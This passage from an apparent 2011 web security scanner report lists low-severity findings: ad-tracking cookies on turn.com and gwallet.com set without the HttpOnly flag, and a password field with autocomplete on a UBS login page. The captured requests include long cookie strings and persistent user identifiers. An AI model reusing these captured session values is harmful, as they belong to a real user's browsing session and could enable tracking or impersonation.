uItohCE1GVLsDIM9OdE-Q70TxRIlHcKuOK0l22qglRvlRyVeDa5R_skBBpROqVdegphoCA2EMAYy34m3C8AxbQVXv2tLid0B5RDfv1jI7nqI1f-8CctWfpBr-abLfwawha_eevSu-BeNRGS6-l3e5LdUzjTr5IHUlZPEoPSUcuuHcGVq3GMZ6CGJzLxK1NMIN_YWa2WWtfKqGIbTsLzoX0-JPgHLZuqjGn3YuU0loBjwMsmJ7XoXxix2tpkkNV5h1NZXB331PWryy2AG1BPJuJLVT4zIbE77kZcMZssTCDF_zNz
v-hOQROl4HLc4UEWkb-u9aQ2rlen_mi55lWZqga_d0hTj-SD3oxsmwzn6Nq55trU-j1GQDzb1_ZvVwhRx0Q_uptE48rH8XCjOJUjQpNRLtZUDvekFZYlXQhitDAZOk6GY0VvVV0mCTSvypWIKrmyCjnr_gKagRSe4UTtSCll_gcGWTDNHC7qecFGk6z3e4O0QjMPBVo19szbTqBQzKlRSAllb1lD1Roagx8HVZqckVirWevftR-aku-hH_QPd78uCldR6o9Qveax8GXpS-aKypm31G_2IGt-C8CPV-k7sgwePfDaD07bFLHwbqeTRWrco6_yM2p6Eot3ZwbE8FNSMSRIUsVwczLLGyq-r3M1YwftiV7Mf5QNKakiimAbPOjWExPrbATLtIx3O0c7l-xfe6kPje8Lja2G_-zUipKgOcNMCj-oHgdiHJqq2uIgWnKHornuDOeLaiUkHIWVvckwkpCJBC2lm-u9i2rrm29_ZDe5dliakw6C2Rj8twiLlfzlikzpR7JfAp40cJcV6GlW0tIfGplg51pTREVDGmHH4AODXGdnK9TWlENpzw35TNdxfAxeUs1cPEOi64rainP0SCUkAmOLbuWn7tumbrHggoOTL0WyCGh3thvCqRtyaVRZz-2-3jDxWUSFOnuPF3ocmPNwA_bOdm7YVJUp4jOEdBZiYsXssmmvAyBz0cS2i2Tg9SBfWFvM_sO8OKD15OvQrtoSZMz5FTL-BuuozwA6N992I4-6hay9R2qPdJa0ze6SLrcfsCWB4Ky3zErqDyKQ9H0wl5_pELpIMT-1qNVdptv-2EVPdJHgZb0fdvbb_D05T4qw5NQ4IrYDRR6LV3elq1du1FqUseWHsqUVdnaZ2p6yXCUtvl4kPfb3QvIQhlltw8I1JpUh0NabZ58BmDwzPN5xltYK_LIcmdq_cpCxj7gQ2WlhFEkoKakhmHHWFkCePG_lq0jHRCZqo4u7okLdFJqi-23qryL4RN3Z0_aFQqDJg0rCBPD3aZqwLxsqDIrP0omCCN4boCegtfrjelXIeOuxrabXhN352MSihMc3-CVcb_kL5lOT9YcyoeJCg59Ijq8T2zgbVOU6zwBc9BcCnSWHFJw_RNB4fezftLML9d5dfvImsTPPvytRq-SoKYxwTHeA0JV-k-xaXuxkj_GEZSFgKdvBKHx9YsruAWjGFxZI0LubOY8fcDAh6xXzWCLVyQcJ-4oTSkYea1NH6xrxdYAaCV1D2k5am92malOiIupL4cMEfCOY7PzeBIuEFG_TjYOgum33GKCIuS7h__v7R45kyBgr7GCpwTTxWPWsVXGEu3LV_WOrXIlPfB_scXK7chTLmYhurC2Xmi93xEyKCpBoulsldLgoWwnRjkFUAbIECT6iggql6xRUe762UGNEynlJ5s-S_H9UP9RUUV02QidOFo-W0MGae-aRTNY2Bw09vXCoTf8EnEVDK1AK-L1; Domain=.turn.com; Expires=Mon, 02-Jan-2012 15:39:04 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Wed, 06 Jul 2011 15:39:03 GMT

GIF89a.............!.......,...........D..;

10.69. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/du/id/L21rdC8xL21jaHBpZC80/rnd/999

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: uid, rrs, rds. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/du/id/L21rdC8xL21jaHBpZC80/rnd/999?nocache=1754&1=999 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://p.brilig.com/contact/bct?pid=14CFF267-5CAA-4454-864E-139B5E28A8FB&_ct=iframe&adid=2723&action=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=jPCRKqrj87qIJxtlMQWAeEChT2n2hjlNeUtfI18EVvCY481wEkFtGX7HudJA1SwJI3d8wh-8F3M_mXcdjcS-VSm0eLaoIKxUGXp9LrfCkU9_tnfsaUjBl08t5WPRK0VURVro0VaYJSFBW8ummLzmaIKBmXLKaNQC_VstFH2_fFpKQkzhSzd0OA7TdBU9TjZEJGXtc03lRAW7XQ4DISJNToVALrQWz2MTLkxqGX2dkixiiuCgw-RUBPrhyXIonq-JO1Bp39fVI570M3anNYXEeUs1tPAJ0EW-1VMg8V7a5wldzyMGDGIyTnWkwLiiAh9MnoUAhDiUl9Tegk8e5loBtCPfUfWmFvuHa7ho64SbyNRCdB0gGLuWZn2SFARzFJPESwQcmlx05sJTCiLTcgCP4At5Nkw2i8ci7zeXoamyfIkXLuYA-Dhd_NCbS18tUNtNvkWLzJ6aRrpGreADONKQFjqdAq7HLak39li3oOzBb2LeZa7kJWdY4s3_LxRnaveh3zRKhr_QKICSCDvtEvXL5bc_DW9fRIIhGqjaZpBQKPuvEW4pltifd2UFOGJBUm-HNrIvCCgnCtouI-Uiugr_XDqnokT_uSlOVd9om3L3_Zyu-SvKhx26d2lgxRL2g7NnpnufmqwPr0iX6TO_QvAchAci1X1kdq4IOav-VGBUnPFENQMte8mJeFRkxXb-wFJ5RVro0VaYJSFBW8ummLzmaNGHuZ00Doye8JlLv5mr5PFKQkzhSzd0OA7TdBU9TjZEAKZ1XvhQcWRwSquFFdyqk27PUbblbYukMk_ukxgrNp1iiuCgw-RUBPrhyXIonq-JrVUsFGMjIsjG4wG8JccNY0s1tPAJ0EW-1VMg8V7a5wn-FB-cNjGuev6cKfXYBTnN0_vou2SdMt8u86ZsS3JrqiPfUfWmFvuHa7ho64SbyNQHZddyBwQ_bn6DeUZJIktJSwQcmlx05sJTCiLTcgCP4PkIlx5s8TLQpLlToa_KmjIJFHg-6pvIHl5Jd-boptVivkWLzJ6aRrpGreADONKQFi1uWhCbBLDkUUl3GB-cia7eZa7kJWdY4s3_LxRnavehkKIyZUcKn4gaSbbrzqSrcgqUnZs_qTc4J1uECWvW6WbTYemUMl4rww0Ahse7Jfbjh8YLajdpYA5oCRPEinWDNzqnokT_uSlOVd9om3L3_Zxs-1IWnYFHuATbbO_y4X0qnTAQXKSKZxRRHNLIhO3aIaSqEypMHifOKCbgAvu2-dYixi2mthDBgkkh8E1XVaeYRVro0VaYJSFBW8ummLzmaFVfdYHK1Q73JpHXN0tZ5ChKQkzhSzd0OA7TdBU9TjZE1kmOSSok1OTXuW9iz2m4nL5yE_6sd6seuxofVhtsYmBiiuCgw-RUBPrhyXIonq-JQurUvISATSSNOXvmuhMCV2KK4KDD5FQE-uHJciier4klqT8ZcugfJqC9EwK5ktSgSzW08AnQRb7VUyDxXtrnCWozIMOsCXwOUoX3GwmeVVAxi8wzskQPsxtBtldyMSwagsPhD5djythOHSHCTJOhXN8kothY4cGzuNEdryxzqqlLBByaXHTmwlMKItNyAI_gA5nIMgtWWpg9SGtTLubci8mKqUVNtCEf11hjerFm783rueT8thuReMGYM-G8N401JqMaNEKucbt7MzwWQQWU-d5lruQlZ1jizf8vFGdq96EVQq5esqu6oyUY2zlzU2xLXWhOIfbu6nlVGazQ3C00oYS8zm8KaUf2JPX_XkHFplCbza_ABfjL7BKJWmajZwI8OqeiRP-5KU5V32ibcvf9nKIPnlMyG4VsL_dpoB-0W9QGvLE_z_KyAskRioKbfxN_786M9IuI8BYnDc-poA-MUnfZxmx8Z1na_56NWnVp5lVFWujRVpglIUFby6aYvOZo-guTtl2FC1HRuw7-BKiPgkpCTOFLN3Q4DtN0FT1ONkRfEwEV-i4hDFcRNIjoo
2NgkPVO08UdjTRS6iKsNti_SGKK4KDD5FQE-uHJciier4kPyz-Wufncl9LyPoL9B1QKSzW08AnQRb7VUyDxXtrnCYqBIOxmA7cQDFoERRAumqjQS-E5nxed_shBlbXuObLDI99R9aYW-4druGjrhJvI1JH00lIUEmEEA_OFUDNzutxLBByaXHTmwlMKItNyAI_g_3bTqCYCGbHkXEVzPY_01mXeNri_O61lm1ldtHVrpR7ZPRGnTyb4BtK8arS2F9YZe4UCz5TMA5hwrPrqery6C_wkRIQCoel50LHttKKxvj2T-81UMTQPlYAknpDpTSLEO5HiathQKE8omxVc53FpCRoxDfNmYDnxg0EvFrwRe3pCS4dcida2s-s0XQ4z8fCn0-2F-mOoQpGwjdYnRQCARZtq_gHnWf9fXfe0G5ZJVnGpH8LKKIm0TYD_Luo27v_Fd79BPBBGXhysRhWpW1cyG4cyxzjZGmjTf1aqiATmAjS8PU8Ims583iYmtl6BnonGOZ_I42pI-l997CutSY5UTnU6t7Hj0VsEozVWpOhdHdFbLfPqvGJUWoA-TUxLJGtuWy3z6rxiVFqAPk1MSyRrblst8-q8YlRagD5NTEska26shJ8rvIZ2pEIvj7vJYr_-ftZVQVVx5oyA1oNVdb0c2RvgUG90xsnNOLDcsndxj6Hfhp4cgON-zdligsRs6_1T34aeHIDjfs3ZYoLEbOv9U9-GnhyA437N2WKCxGzr_VPG0U7eaD3Hbtxwd0g2BAEnxtFO3mg9x27ccHdINgQBJ8qENCoPz5YPQkhGm2FiUj3LFz3e1wa31-DKI83R83jg3QTL9zDrzTFlXoiMqjuSWt0Ey_cw680xZV6IjKo7klpI3j9xuCx21BIxBdXN5YAR9AhrAwqavcLA2O6a4z37Lsij7qsRPo1Q9IcnQsYBZ5nZ4Yik6WYEG4S1yIWi95cAawB_d25XmA1YnkFKy4M4_IsLKOVSlL41zvQ6wOKAHEjq7nKInFrgoG_62xoiLBKT6u5yiJxa4KBv-tsaIiwSk-rucoicWuCgb_rbGiIsEpOvDsfne5seg63D4x3flsyZrw7H53ubHoOtw-Md35bMma8Ox-d7mx6DrcPjHd-WzJlOSrp14Y383TLXFJ1T7HeQDdh5RodnqZ0dgGASOf1Fng3YeUaHZ6mdHYBgEjn9RZ6k3CneyeK26bqX2BslrNlwDg97pn0xq8XVtSFY17J1rA4Pe6Z9MavF1bUhWNeydawOD3umfTGrxdW1IVjXsnWsZmDwoJlEZXfDBjNrKbkdHGZg8KCZRGV3wwYzaym5HRxmYPCgmURld8MGM2spuR0cbb0sPsXWgw_x9D6jnx5LK_2BhDosUowXxXmwB90G1tj9gYQ6LFKMF8V5sAfdBtbY_YGEOixSjBfFebAH3QbW2GhE7gFloT4X513bbUoowJpoRO4BZaE-F-dd221KKMCaaETuAWWhPhfnXdttSijAmjoFfr6E7AtWKXcAv7zPgNhKraltt_znEUtPzey_YSNRSq2pbbf85xFLT83sv2EjUUqtqW23_OcRS0_N7L9hI1Fz-QUXxY9m0RT2v_0PtAEz3vMJW6Nolrhqx2yRbBnwHeM8DMgjvm5t97BtYytOx4Rqhj3O8p-XR3nA6DvXKpTl; 
fc=NPwnTj55SxablmgxgOU6YvTAau0fxQm9Ss2FVtOc0fRwe2fiMiJstcorldPAQEWsjtR00WuVUesotFeF8b0iqzTwskhjzr5X5fLnW2Y1L8oWeSZAoSqfzCTWGJqSVzUxwmWj6rOwJQbNe1FGkQ72Mr3ZyRv0KSWu8UtGn86vdZZ2Bxw8hDOLkguYqml5zW-MINBiIQ09VuaB6H4kNZ3jvWDXo_Ub5NvFSqNxsTqhNOEJzdGEYQUbYRsENlG1EkxlHr-vpMpIww2oeMaNqJcAGNVCVYgScgvT-7lnf3tWEtoI26ZIhO_EYD2Jv5etTb7nPXORZ_ihz3v_EDqUfBGd38kaFp7wmgHwSln4BB0aAU-Y-fE6mCrmAAKxJpNINZh0gYrE3U6bhGdZv_0Ofvauqo02tkR5MgBK5U8r1oXGHyKLM2r82BMAlsOE4kKakojRElg7FxL2FmmNWsvuLk3EV1Ob1kR0cv3Vim-wWYu2PuOaPtJF5zGBev3l88f3V44c; pf=imLa8Y9K7y9JWjvDp9rzLXdg786oafP5T-2J8P9-MbRqAdtWEIdLx553uOXwyk_d7lMV6ku5x6Fs62Dm_QelJC3HNez-Z8pMdla1M14yZ1aXhaLn0WGDkLMH4cxWtxtJnQ3ziRBzpEB5dtK5nAeBUmYbbn7O8vmG9T4ZvTBxZ-fkUczbVJT5Cai6PVkpiYM250Hn9REtTxKxE8sY6J3ypnin2DltV7TDetw9hjspxXZhD8p41r9TwMfEMg-G1XemtTB2tozm01YLbZIiUMvmqnqcRK5l5t99h9o1nyRJGB_k59seAzgg1-n2fcjLvpOMi9tA_b87Jqn_e3gK2wczGx_CWj995ZG4J9ayZG8Azab13_ic6bm3qPlYluqL2y0jaU-Oqt1gdom4zJIFfDwZ9PMXsV2RPLlXKhVOkCzWSAMHy8NkV9GlxOD5jcadlcpoFV-_N4_TQoIGyiXOJHiskWx1ZATf6jr6V7CCyVFok1rG6pyhUqm2FHzEiDJ6sf-pacXWwno-sBBfZi85NtW5Qt-_BHDFm96AL-Hlvz6iB4BqpqgoK--2Z8dYtNlLNE0_IPCGGg4JuduY91z0-G9PFEs00MFyErnctvH2BT73d3_FZBD7b-KShsGHFtw-PJccEMxwAG8SoEVS9m9Zd2vmWErUUgLCw4NxIwxNfjDRkuTL2j5Yg93F_QOtFzYyWOePChv1i2naEiRm-G40oRJBGTBpVCc0qMQ7XSXeQvsWsjFHiMSxf4LuiqRb7JIEpKg8kby9cY_1mRgRy-7Zp8tzhfOiqJ0pMkyWUtj3tCfqb_tGZRzNBjxRhmI6dM4mbZKOYU4-nV0UYeEGUxF1S_oHu4hFkzr5r4tc43qm6cSueuRO2hVcsSqb840lbAIGS9ubZxGaNUCyMdwNgf2avKHVNnolOOu7jj76mTVAdA_mdYfmHtPNZuqI_jxiXxEOs5H0vlfIlKbmfHqHUcP5b-IIns1zek1KJ0W2qXBTetRtqOYNCGSsyjP4AXt3T9RPBVkJDNnxwnTaHhSt6_M966_yDGRntkal431Er-D6EvQQXSzw07Q7-ZTvu6ltuMBngQyhlUXNT1Hb5nCH2u9H8JYL2vqi7ZcubYPjdCiTEvC6ixvxWnBAvvN4YHBYs623Zfp7mYinN8F-xomiNBADxpAVRXj30kPclrBAUX47luAB61FeciHDtDUZA6oDA9lgECWxePb1qgK2wydMqKon7gU_K8C3sxgZqLnqGwdljDWk8V-5saTK0J9MhEtW2SZi442SAJJiCcWe8XmAo-ZeIFD11aDlRV7nM6V6_zFKpP7wlLYQPKIschJVNwDZdXQ9qmKL_Qbi_JfgEHW4reZkqoXAIHtX_b9gyna0u7aW5BDNIqsWhukbMM8brSoTtnUG56p5TJB44WFzdjkM-mROp9OOL7FDQ7cHkGLYBuqZ3lgWaipiAFXhGx2dqcch-VuzoEikRXiOR4xa
xbvDpaqAiEb8VhvKcFx-ovh4Sl88FoBqgf0tyxN9W-kw0R4q9C5CmY2JUjJXnRD7WzNJZ_sCBAgpM1TWvCRlVZFXXZnqNPukYr_L3KLsKcRyxoRdaMovUBfTNEPRSKFgtbcbx8BqX90ZQQcpEfWqJMVmEBPEAIGejpPCFWKz3O59OPx58buvJ_uvNLcUoXM2ObJkBpZIBDJKm2ziC3HJIl0BWgLsB3Xb9sspub1VzehZ-dnjQrUAX1RWz23DJ4AN2p3Bkps3nmT_CyZOWO0K6AmyoJJ0WVqwfHJmkvMMecgZzynLsGgRc_i10bzP3aegk4VhMUbe1DPDoRajStMsbCQClj0a4aNFYQ33AhPyEf_pRhJLMk6r38S9EXL7rx5ntmq24iXH1baYIQ5WA9IExVRwqhQKkb2ecnJ-2UOQj0PVB__QK20iFxmMrBi_Ozk9p2lUUv6L37oAr_AV6d2dHRLCHQNMiRthyWEMiVlxcMdEeKLokMX7jcq64dIsZNbiFzVInJ14TCwCQ9fqReykA8qBRaCLn3AdbjtskBuPk60M0N683DQsE4ZC-hxMORC22isekOI2V75sPw5QLpTHbDx3qmiChRuhkT71jvR1w1cjNDo5Itf_BvoKeVF3ZR9-1s7QiDoMPUY-ZVqhnCeQMjDTZrbWEsRIvXQWcM2EqCJfHKFgH6ShjUTMi6Fy8HuTX3hHZqIyshrEm0-qlU6GLKu8GfLpkN0bDQNM4p86wye9uBqQI4_fI7zC0JJ2DuRXGxP-2g9_CgYuY8pN_VrecGDh6UwTrru9GLmwxbidN1AUdQybKB4VyjEokVAfrO6zFP7ekqOUhJzASYimudaJc-nqwrLqeBidwfS-yH1nGi3UeGqKb9R2O8_f7i8ovAE8EZ8c3EpZGfdvY3YmYKNPM3iO16JJWQBvkviQa82CG4NkuHuK5hHF8F4pZHDyRRzEoRhIsHjaFVUhglHsoi-_gue4Y9GYFWcPlXqN1LcUW2PklnchprXEhv3r7HtHIEvOa8bUpKMjK8lg77zJlCabEdFr8zLsnvY_jhe-w8LS7NnrSfPrT7_ys5OYzXfKqxN9PqlPQO7yAyIRqyycyKA8i0F3zIMbv5tUub_jys2KG-DoXTNzLTlHYmH8wMN_undN9fZc-pI0Ny4hubjOBUf2DQSm9Ohj3B7jgP9CCqG8Wt-ubVX90wI71XdOFbmuO_nu7xzWg1owdmgiD4haU31wETkVUs2IUBSWSwU9HuGqutvFVd-RPEMlRmI-tk5XQOBLE3hkIaiREQLK5qM9EX44AOJlvs8DYm-_z8wtr-sIKH6L02PQc77v8w4KeUWdpWld1cOt5B9y5dzZtTu3JqKGLAN1pzcD0dPfCuBK65VIPkK5kWZct35sO1Zn7pXWDz9pp4ib7xIdhf9zRg7pMNE_CJ40sHgFesrKS-sIOtZ0uWaFVuInERcUbOl0hZVWfZ4IPC39oh4ISFoEomPNyVVtSZY1RAo6Ssw0gNhdaAh0ubUxGmkN2fgVgehhyd0pky1b6ARNsIvyharCLLEFwpnlzXrhrzzYYv8tbnjLz1Zdsb_zZj1IfqS_aLZsRx-RLssOEi8Ic52I1SwSEzv1L7Xgy2Eldwn0osGTLllLrxdLGKvBbatPkttpJfAXFMB_81ZZqVp19l6yq--kytbvLV02MMBRF8QbYmkHZ9XZAHAsEZLsmJUb3ppXhtS9nRt7KX5Xvit0JJ8VmH7pEBcCAAwb_dsSSirzOYOWSpt9tKo6CdsoHgH6aru4Y4C1Oo_U7A4BsmBGEA7E6lGoeN4cYQLBhIGU78mY0O1B84kcRbagcEY3bvKO4WENO-4Aup8ydwoW1LAK5lzDCZf66Ro0bevR-FWOxJFZXHpkSB-wiy2euPF1s93pcsDAmXOMvRijJwI3i6Kr-KRd8-6tGKt3Z8Sx3Gwu4SNfNZ4Dc9CPpihH8V5KiSx-wwNBb6P5; 
rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C1%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005%7C12%7C1006%7C1007%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15153%7C15153%7C15156%7C15151%7C15153%7C15153%7C15156%7C15146%7C15156%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15156%7C15153%7C15153%7C15149%7C15153%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15153; rv=1; uid=4325897289836481830

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Mon, 02-Jan-2012 11:21:55 GMT; Path=/
Set-Cookie: rrs=3%7C6%7C9%7C12%7C1002%7C1005%7C1008%7C1%7C4%7C7%7C10%7C13%7C1003%7C1006%7C18%7C2%7C5%7C1001%7C1004%7C1007; Domain=.turn.com; Expires=Mon, 02-Jan-2012 11:21:55 GMT; Path=/
Set-Cookie: rds=15156%7C15153%7C15156%7C15156%7C15161%7C15153%7C15149%7C15146%7C15151%7C15156%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153; Domain=.turn.com; Expires=Mon, 02-Jan-2012 11:21:55 GMT; Path=/
Location: http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/4/url/
Content-Length: 0
Date: Wed, 06 Jul 2011 11:21:55 GMT


10.70. http://rs.gwallet.com/r1/pixel/x1094

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x1094

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: ra1_uid, ra1_sgm, ra1_sid. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r1/pixel/x1094?r1s=enJsne_2xin_W0gqpJPdDOiRtZgEH_OufcvtkeNI5aQ HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTAyIDg4ODg=; ra1_uid=4626038992661376064; ra1_sgm=i4-b510-7K0-e5r0-I3r0; ra1_sid=3

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: application/octet-stream
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Location: http://tag.admeld.com/pixel?admeld_adprovider_id=553&_radium=0
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4626038992661376064; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=i4-b510-7K0-e5r0-I3r0; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=3; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1


10.71. http://rs.gwallet.com/r1/pixel/x1225

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x1225

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: ra1_uid, ra1_sgm, ra1_sid. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r1/pixel/x1225?r1s=OUPv0729NeoDz8CeIHHoYeiRtZgEH_OufcvtkeNI5aQ HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTAyIDg4ODg=; ra1_uid=4626038992661376064; ra1_sgm=i4-b510-7K0-e5r0-I3r0; ra1_sid=3

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: application/octet-stream
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Location: http://bstats.adbrite.com/adserver/behavioral-data/0?d=48272602;bapid=12553;uid=1030306;neg=1
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4626038992661376064; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=i4-b510-7K0-e5r0-I3r0; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=3; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1


10.72. http://rs.gwallet.com/r1/pixel/x368

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x368

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: ra1_uid, ra1_sgm, ra1_sid. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r1/pixel/x368 HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTAyIDg4ODg=; ra1_uid=4626038992661376064; ra1_sgm=S4-740-e5b0-I3b0; ra1_sid=3

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: application/octet-stream
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Location: http://rs.gwallet.com/r1/pixel/x1094?r1s=enJsne_2xin_W0gqpJPdDOiRtZgEH_OufcvtkeNI5aQ
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4626038992661376064; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=i4-b510-7K0-e5r0-I3r0; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=3; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1


10.73. http://rs.gwallet.com/r1/pixel/x369

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x369

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: ra1_uid, ra1_sgm, ra1_sid. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r1/pixel/x369 HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTAyIDg4ODg=; ra1_uid=4626038992661376064; ra1_sgm=S4-740-e5b0-I3b0; ra1_sid=3

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: application/octet-stream
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Location: http://rs.gwallet.com/r1/pixel/x1225?r1s=OUPv0729NeoDz8CeIHHoYeiRtZgEH_OufcvtkeNI5aQ
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4626038992661376064; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=i4-b510-7K0-e5r0-I3r0; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=3; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1


11. Password field with autocomplete enabled
There are 26 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


11.1. https://clientlogin.ibb.ubs.com/login

Summary

Severity:   Low
Confidence:   Certain
Host:   https://clientlogin.ibb.ubs.com
Path:   /login

Issue detail

The page contains a form with the following action URL: https://clientlogin.ibb.ubs.com/login. The form contains the following password field with autocomplete enabled: _A2

Request

